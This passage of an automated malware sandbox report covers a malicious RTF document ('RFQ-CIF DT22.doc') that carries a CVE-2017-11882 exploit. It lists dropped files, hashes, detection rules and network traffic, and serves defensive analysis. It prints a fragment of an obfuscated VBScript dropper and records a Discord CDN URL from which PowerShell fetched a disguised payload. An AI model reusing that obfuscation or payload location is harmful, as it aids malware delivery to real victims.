                                                      18:25:21 | API Interceptor | 241x Sleep call for process: cscript.exe modified
                                                      18:25:23 | API Interceptor | 336x Sleep call for process: powershell.exe modified
                                                      18:25:57 | API Interceptor | 92x Sleep call for process: calc.exe modified
                                                      18:27:03 | API Interceptor | 1x Sleep call for process: explorer.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs


                                                      Domains


                                                      ASN


                                                      JA3 Fingerprints


                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\m[1].jpg
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):1920730
                                                      Entropy (8bit):4.744429581128775
                                                      Encrypted:false
                                                      SSDEEP:24576:npBYI4sL/QQX5YfBHzOK+haVIxK5cmZRc7TlD1cpj5:bX5YZHWaVIxK+mHcflD1Il
                                                      MD5:DE726DD453796B237393F7E160EB25E2
                                                      SHA1:AA6FAC0E5EFD84816494AAA746DAA382F571E9B3
                                                      SHA-256:1755604F7786452EE2991D3193193153F4A9F4C4C708204D64B9135CD6F26A3C
                                                      SHA-512:52B02A3E6A17AAF6D84219DDE9D2E1B7BA672FB6F1B03919C6C85D80F9A6C5E6C9C675895A4CFF0EE46FF1AD4802C902DB4F99E7C7B62477645F25A750A25D11
                                                      Malicious:false
                                                      Reputation:low
                                                      IE Cache URL:https://cdn.discordapp.com/attachments/915347845752705109/915799206072045578/m.jpg
                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                      Category:dropped
                                                      Size (bytes):14848
                                                      Entropy (8bit):4.812816781063635
                                                      Encrypted:false
                                                      SSDEEP:192:7Nvugo5qhwPXk3Ur1yF9q2Jh9tp3F5lQtFQ+:7o4K/k3UrEo2Jh9tpV5lQt+
                                                      MD5:30E8134C66F2CE7C35BD554D66974D08
                                                      SHA1:5ED39A43359A7F2CF00D093B61E658A5F0072D01
                                                      SHA-256:369A7416A65B62AA8A3CC7EB8EFD2C2D8255B3D502931EB7ABFDB359926CDAF4
                                                      SHA-512:6074FB6CC8FBE3E6FC898F8D62E00E186911152AAC831276A94C4B83DC736212F8746BEC53EFA97C52B5811A423F086845CBA99B7DDF510FCF2C4D0F536AA1D3
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: rtf_cve2017_11882_ole, Description: Attempts to identify the exploit CVE 2017 11882, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp, Author: John Davison
                                                      • Rule: EXP_potential_CVE_2017_11882, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp, Author: ReversingLabs
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3C4C0964-F4E2-47CE-9342-09F02AAEAA3F}.tmp
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1024
                                                      Entropy (8bit):0.05390218305374581
                                                      Encrypted:false
                                                      SSDEEP:3:ol3lYdn:4Wn
                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                      Malicious:false
                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4420D3E3-CE9B-451F-BDF0-DF912D785C06}.tmp
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1024
                                                      Entropy (8bit):1.1722028273607172
                                                      Encrypted:false
                                                      SSDEEP:6:beKNc1ElClXiKNgREqAWlgFJYm7KmrRmvlw5Fr+ur8FrK:beOc1MClXiOk5uFJd5Rmvq5ZP8ZK
                                                      MD5:75FCAEF5B6C0ADE6AF66F49874853C6A
                                                      SHA1:834FA72EEF104773D7052895798FED035EF01594
                                                      SHA-256:01E456476480AA1FD27ACF8F02AEA30D9B09581579A029154A6CD2A6850C85A0
                                                      SHA-512:5E7DBBEB9534660466B7ACD9E70725504C33CC435C08D30ECE035B7CC13F5DC8AAB73F8CA16AA562697063059FEC3C5EE8258F108EB68C8B1071DD381FEDB99A
                                                      Malicious:false
                                                      Preview: ... Package EMBED ... Equation.3 EMBED ...
                                                      C:\Users\user\AppData\Local\Temp\Client.vbs
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8464
                                                      Entropy (8bit):5.294959126164496
                                                      Encrypted:false
                                                      SSDEEP:192:Kugo5qhwPXk3Ur1yF9q2Jh9tp3F5lQtFw:H4K/k3UrEo2Jh9tpV5lQti
                                                      MD5:ADD66C29C9FCCD7D098554FDC028172E
                                                      SHA1:3E816CBEAB5729A796A6396626D94FB7DAA7C208
                                                      SHA-256:B893967283A7085083CF7BBA86C0B1ED15AAD5783F45853D7213F1804246C07D
                                                      SHA-512:81C24DD500516C4B701CD101020FE79DC5EC91D9796C987DAC897306400678113FEFB0D0A0E3A5B5D04440D4E3DDB9DE2DDE47751B8C6F584D9665AD422DF7EA
                                                      Malicious:true
                                                      Preview: SPLevel0xCRC341414141 = E0xCRC341414141(G0xCRC341414141() + H0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..sKeys0xCRC341414141 = Eval (E0xCRC341414141(")"""",emaNtpircS.tpircSW,emaNlluFtpircS.tpircSW(ecalper"))..GetObject (E0xCRC341414141("B0A85DF40C00-9BDA-0D11-0FC1-62CD539F:wen"))..F = lValue0xCRC341414141 + "\" + WScript.ScriptName..If sKeys0xCRC341414141 = lValue0xCRC341414141 Then..WScript.Quit()..SPLevel0xCRC341414141 = E0xCRC341414141(G0xCRC341414141() + H0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..Else..End If........Function F0xCRC341414141()..Execute("TristateUseDefault0xCRC341414141= ArRAy (""eT"",""aE"",""rC"")")..'Check the output directories drive to ensure there is enough free space for the fil
                                                      C:\Users\user\AppData\Local\Temp\Client.vbs:Zone.Identifier
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:gAWY3n:qY3n
                                                      MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                      SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                      SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                      SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                      Malicious:true
                                                      Preview: [ZoneTransfer]..ZoneId=3..
                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\RFQ-CIF DT22.LNK
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:55 2021, mtime=Mon Aug 30 20:08:55 2021, atime=Fri Dec 3 01:25:16 2021, length=2186640, window=hide
                                                      Category:dropped
                                                      Size (bytes):1024
                                                      Entropy (8bit):4.55531324967487
                                                      Encrypted:false
                                                      SSDEEP:12:80ldN6C0gXg/XAlCPCHaXjByB/AVtX+WR6L57OuicvbKRtDtZ3YilMMEpxRljKZ8:8ed8/XTTc+bo72e+LDv3q0R7m
                                                      MD5:749C635C18D5512E0F197CAB17048A47
                                                      SHA1:5E29EFECF25DC7BEEFC0B07AD790E9AC009491CA
                                                      SHA-256:D6F5642556529AC2AE22F75A43A180DC00E483EA7EEEE7935F0D14710522BE5F
                                                      SHA-512:96839E16C325B4491CC926CCF8988FD920D03E10E03FF16DB550B06E78A976FE5A3A68F83EF59DF8E57FEA0E6E6B47A2958AAE71F74DB7DCF8F0C9FEE63BC7D9
                                                      Malicious:false
                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):75
                                                      Entropy (8bit):4.852040277613462
                                                      Encrypted:false
                                                      SSDEEP:3:bDuMJlvDhxLUmX1FlhxLUv:bCkJw
                                                      MD5:E478B6695C14BFD45080736C657C9DA8
                                                      SHA1:8AFE29DB5E61C261A803727E23D451C47E8C6C03
                                                      SHA-256:84D6786544B4E0E402A83989D6512D49AF1392B67A119210E1F3971E1D556BC4
                                                      SHA-512:B7EBA5503968DC20399E3A96281D353BAAFC2DAFF2A2CC922F91B423A045FF9EE20E75741843D74EA21389C5BE0F4F14686AB367182595486EA8FCC996DEBD58
                                                      Malicious:false
                                                      Preview: [folders]..Templates.LNK=0..RFQ-CIF DT22.LNK=0..[doc]..RFQ-CIF DT22.LNK=0..
                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):162
                                                      Entropy (8bit):2.5038355507075254
                                                      Encrypted:false
                                                      SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                      MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                      SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                      SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                      SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                      Malicious:false
                                                      Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy)
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.5767705248043695
                                                      Encrypted:false
                                                      SSDEEP:96:chQC4MqKqvsqvJCwo6z8hQC4MqKqvsEHyqvJCworUzKAYnHhUVX/lUV4A2:cmzo6z8mnHnorUzKtUVXrA2
                                                      MD5:204BEE1F37AFC85A6C699A7BB13BFAE5
                                                      SHA1:AB15195A1918ADB6CC9EFFA0472083578E82B982
                                                      SHA-256:A44BD247E61B952BBF46D8493C6A66043CE37085C848C5C12EB809B51E7D9FE0
                                                      SHA-512:3588673DA85416A0955C8E03FDAFF27F111E2B79BB1F5760400AC3D70701ECAF5C7581B828079CF268FD43D62303DF16FB0DF18F7004E95C3925FD62E9EF2B56
                                                      Malicious:false
                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S .*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KK4DZQVDIZP6O1GVC4FY.temp
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.5767705248043695
                                                      Encrypted:false
                                                      SSDEEP:96:chQC4MqKqvsqvJCwo6z8hQC4MqKqvsEHyqvJCworUzKAYnHhUVX/lUV4A2:cmzo6z8mnHnorUzKtUVXrA2
                                                      MD5:204BEE1F37AFC85A6C699A7BB13BFAE5
                                                      SHA1:AB15195A1918ADB6CC9EFFA0472083578E82B982
                                                      SHA-256:A44BD247E61B952BBF46D8493C6A66043CE37085C848C5C12EB809B51E7D9FE0
                                                      SHA-512:3588673DA85416A0955C8E03FDAFF27F111E2B79BB1F5760400AC3D70701ECAF5C7581B828079CF268FD43D62303DF16FB0DF18F7004E95C3925FD62E9EF2B56
                                                      Malicious:false
                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S .*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                      C:\Users\user\Desktop\~$Q-CIF DT22.doc
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):162
                                                      Entropy (8bit):2.5038355507075254
                                                      Encrypted:false
                                                      SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                      MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                      SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                      SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                      SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                      Malicious:false
                                                      Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                      Static File Info

                                                      General

                                                      File type:Rich Text Format data, version 1, unknown character set
                                                      Entropy (8bit):5.158217624869737
                                                      TrID:
                                                      • Rich Text Format (5005/1) 55.56%
                                                      • Rich Text Format (4004/1) 44.44%
                                                      File name:RFQ-CIF DT22.doc
                                                      File size:2186640
                                                      MD5:66c72e808d6803f22fcd6ec419a6f039
                                                      SHA1:0ac316f9fd8f6b3d8cfd05924f2c3704df112df7
                                                      SHA256:0c5704edd32b5754f2caf5a45caef11e0fa1a9381c84b05f391b9b8d1c101a3a
                                                      SHA512:6222a0e54447ae37615ab7cbcfc9d7386802b77692f96b30c285c24ca520e3cee9c0b83dceb0581a870ff47f0ed8d852146202ec9c86de5877b82a8a12154aef
                                                      SSDEEP:1536:Ibz4J3fbgjEE7wcwEwrwDwlwSwEw7wlwbwXwHwlwLwzwMwOwZwww7wlwbwXwHwlj:7E
                                                      File Content Preview:{\rtf1\posx2160{\*\pnseclvl3\pndec\pnstart1\pnindent720\pnhang {\pntxta .}}{\*\pnseclvl4\pnlcltr\pnstart1\pnindent720\pnhang {\pntxta )}}{\*\pnseclvl5\pndec\pnstart1\pnindent720\pnhang {\pntxtb (}{\pntxta )}}{\*\pnseclvl6.\pnlcltr\pnstart1\pnindent720\pnh

                                                      File Icon

                                                      Icon Hash:e4eea2aaa4b4b4a4

                                                      Static RTF Info

                                                      Objects

                                                      Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
                                                      0 | 000011FEh | 2 | embedded | Package | 8631 | Client.vbs | C:\Path\Client.vbs | C:\Path\Client.vbs | no
                                                      1 | 0001CF7Bh | 2 | embedded | Equation.3 | 3072 |  |  |  | no

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                      12/02/21-18:26:36.226933 | ICMP | 382 | ICMP PING Windows |  |  | 192.168.2.22 | 216.58.215.238
                                                      12/02/21-18:26:36.226933 | ICMP | 384 | ICMP PING |  |  | 192.168.2.22 | 216.58.215.238
                                                      12/02/21-18:26:36.248280 | ICMP | 408 | ICMP Echo Reply |  |  | 216.58.215.238 | 192.168.2.22

                                                      Network Port Distribution

                                                      TCP Packets

                                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                      Dec 2, 2021 18:26:37.722667933 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.722693920 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.722770929 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.722875118 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.722954988 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.723001957 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.723078012 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.723123074 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.723190069 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.723298073 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.723359108 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.723412991 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.723428965 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.723463058 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.723469973 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.723480940 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.723500013 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.723545074 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.723560095 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.724901915 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.733524084 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.733601093 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.733740091 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.733758926 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.733771086 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.733776093 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.733900070 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.735136986 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.735174894 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.735232115 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.735245943 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.735255957 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.735291958 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.735467911 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.735518932 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.735573053 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.735579014 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.735585928 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.735589981 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.735629082 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.735816956 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.735867023 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.736124039 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.736135006 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.736174107 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.736222029 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.736227036 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.736232042 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.736254930 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.736279011 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.736315012 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.739691973 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.739768982 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.739835978 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.739846945 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.739877939 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.739918947 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.740144968 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.740223885 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.740238905 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.740247965 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.740315914 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.740406990 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.740523100 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.740597010 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.740628958 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.740639925 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.740700006 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.740705967 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.740922928 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.740995884 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.741048098 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.741060019 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.741077900 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.741170883 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.741391897 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.741466999 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.741482973 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.741493940 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.741558075 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.741780043 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.741859913 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.741893053 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.741903067 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.741978884 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.741985083 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.742178917 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.742250919 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.742264032 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.742275000 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.742336035 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.742613077 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.742688894 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.742744923 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.742754936 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.742784023 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.742805958 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.742912054 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.743031979 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.743104935 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.743197918 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.743210077 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.743218899 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.743299007 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.743702888 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.743812084 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.743855953 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.743865967 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.743946075 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.744070053 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.744194031 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.744225979 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.744231939 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.744371891 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.744378090 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.744432926 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.744565964 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.744574070 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.744589090 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.744750023 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.744822025 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.744971991 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.745259047 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.745265961 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.745286942 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.745404959 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.745532036 CET49165443192.168.2.22162.159.135.233
